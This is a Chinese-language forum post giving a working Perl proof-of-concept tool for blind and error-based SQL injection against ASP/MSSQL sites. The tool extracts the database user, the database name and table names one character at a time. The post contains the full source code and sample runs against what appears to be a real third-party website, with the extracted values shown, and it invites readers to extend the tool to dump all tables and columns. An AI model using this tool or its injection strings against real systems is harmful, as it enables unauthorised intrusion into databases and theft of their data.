cawan的《SQL Injection做資料庫滲透的一種思路》perl程式實現

昨天看了cawan《SQL Injection做資料庫滲透的一種思路》一文，感覺確實不錯。於是我就把它文中提出的方法用perl實現了一下。這個程式只是個POC版本，所以呢我只實現了猜解user、db_name以及第一個表名的功能，其它功能尚未實現。而且程式中猜解部分的演算法我也沒有最佳化，用了最容易編程但是速度和效率相對低的演算法，明眼人一看就知道。

如果大家覺得有必要，可以考慮將該程式擴充，增加包括猜解所有表名以及表中欄位的功能等等。當然，如果要發布就不要用perl了~~~~

程式運行協助如下：

H:/temp>sin.pl
********************************************************************************

          SQL Injection New Method POC

            Method By cawan[EST]

            Coded By superlone[EST]

    Usage:
          sin.pl url

          -u   try to get user() return value
          -d   try to get db_name() return value
          -t   try to get first table name value
    EXAMPLE:
          sin.pl http://www.xxx.com/userinfo.asp?id=1 -t

********************************************************************************

猜解user的過程如下：

H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u

[+]Testing if there is vul in your URL page...

[+]SQL Injection Vulnerability found!

[+]Guessing user() return value length...Wait!

********************************************************************************

[+]user() return value length is [7]

********************************************************************************

[+]Guessing user() return value...Wait!

********************************************************************************

[+]the 1th letter is:t
[+]the 2th letter is:h
[+]the 3th letter is:o
[+]the 4th letter is:m
[+]the 5th letter is:a
[+]the 6th letter is:s
[+]the 7th letter is:a
[+]user() return value is [thomasa]

********************************************************************************

猜解第一個表名的過程如下：

H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -t

[+]Testing if there is vul in your URL page...

[+]SQL Injection Vulnerability found!

[+]Guessing first table name length...Wait!

********************************************************************************

[+]first table name length is [17]

[+]Guessing first table name value...Wait!

[+]the 1th letter is:g
[+]the 2th letter is:e
[+]the 3th letter is:o
[+]the 4th letter is:i
[+]the 5th letter is:p
[+]the 6th letter is:c
[+]the 7th letter is:o
[+]the 8th letter is:u
[+]the 9th letter is:n
[+]the 10th letter is:t
[+]the 11th letter is:r
[+]the 12th letter is:y
[+]the 13th letter is:w
[+]the 14th letter is:h
[+]the 15th letter is:o
[+]the 16th letter is:i
[+]the 17th letter is:s
[+]first table name value is [geoipcountrywhois]

********************************************************************************

非常簡單的實現，大家就不要笑話我了。。。整個代碼如下：
#!/usr/bin/perl
#method by cawan{EST]
#coded by superlone[EST]
#use strict;
use LWP::UserAgent;
local  @alpha_code=('a'...'z');
local @number_code=(0...9);

if(@ARGV==0){
    &help;}

my $url=shift;
my $ua=new LWP::UserAgent;

if($ARGV[0] eq "-u"){
&testpage($url);
print "[+]Guessing user() return value length...Wait!/n/n";
print "*" x 80,"/n";
my $ilen=&guesslength($url,"user");
print "[+]user() return value length is [".$ilen."]/n/n";
print "*" x 80,"/n";
print "[+]Guessing user() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]user() return value is ". &crackcode($url,$ilen,"user") ."/n/n";
print "*" x 80,"/n";} elsif($ARGV[0] eq "-d"){
&testpage($url);
print "[+]Guessing db_name() return value length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"db_name");
print "[+]user() return value length is [".$ilen."]/n/n";
print "[+]Guessing db_name() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]db_name() return value is ". &crackcode($url,$ilen,"db_name") ."/n/n";
print "*" x 80,"/n";}elsif($ARGV[0] eq "-t"){
&testpage($url);
print "[+]Guessing first table name length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"table");
print "[+]first table name  length is [".$ilen."]/n/n";
print "[+]Guessing first table name value...Wait!/n/n";
print "[+]first table name value is ". &crackcode($url,$ilen,"table") ."/n/n";
print "*" x 80,"/n";} else{&help;}

sub guesslength{
my $url=shift;
my $func=shift;

$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
my $i=0;
while($i<32)
{
my $temp=$url."'%20and%20len(".$func.")>'".$i++;
#print "[-]Structured URL:"."$temp"."/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Syntax error/ ||$res->content=~/Either BOF or EOF is True/ ){
last;
}
}
return $i-1;
}

sub testpage{
my $url=shift;
$url.=" and 1=1";
my $ua=new LWP::UserAgent;
my $req=new HTTP::Request('GET'=>$url);
#print "URL is ".$url."/n";
print "/n[+]Testing if there is vul in your URL page.../n/n";
my $res=$ua->request($req);
#print "return content:".$res->content."/n";
if($res->content=~/Syntax error/){
print "[+]SQL Injection Vulnerability found!/n/n";} else {
print "[+]Page has no vul or server error echo disabled!/n/n";
exit;
}
}
sub help{
print "*" x 80,"/n";
print "/t/tSQL Injection New Method POC/n/n";
print "/t/t   Method By cawan[EST]/n/n";
print "/t/t  Coded  By superlone[EST]/n/n";
print "/tUsage:/n/t/tsin.pl url

/n/n";
print "/t/t-u   try to get user() return value/n";
print "/t/t-d   try to get db_name() return value/n";
print "/t/t-t   try to get first table name value/n";
print "/tEXAMPLE:/n/t/tsin.pl [url]http://www.xxx.com/userinfo.asp?id=1[/url] -t/n/n";
print "*" x 80,"/n";
exit;
}
sub crackcode{
my $url=shift;
my $userlen=shift;
my $func=shift;
my $i=0;
my $j=0;
my $k=1;
my $bfound=0;
my $name;

$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");

while($k<=$userlen){
$i=0;$j=0;$bfound=0;
while($i<@alpha_code){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$alpha_code[$i++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$alpha_code[$i-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=1;
last;}
}
while($j<@number_code && $bfound==0){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$number_code[$j++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$number_code[$j-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=0;
last;
}
}
$k++;
}
return '['.$name.']';
}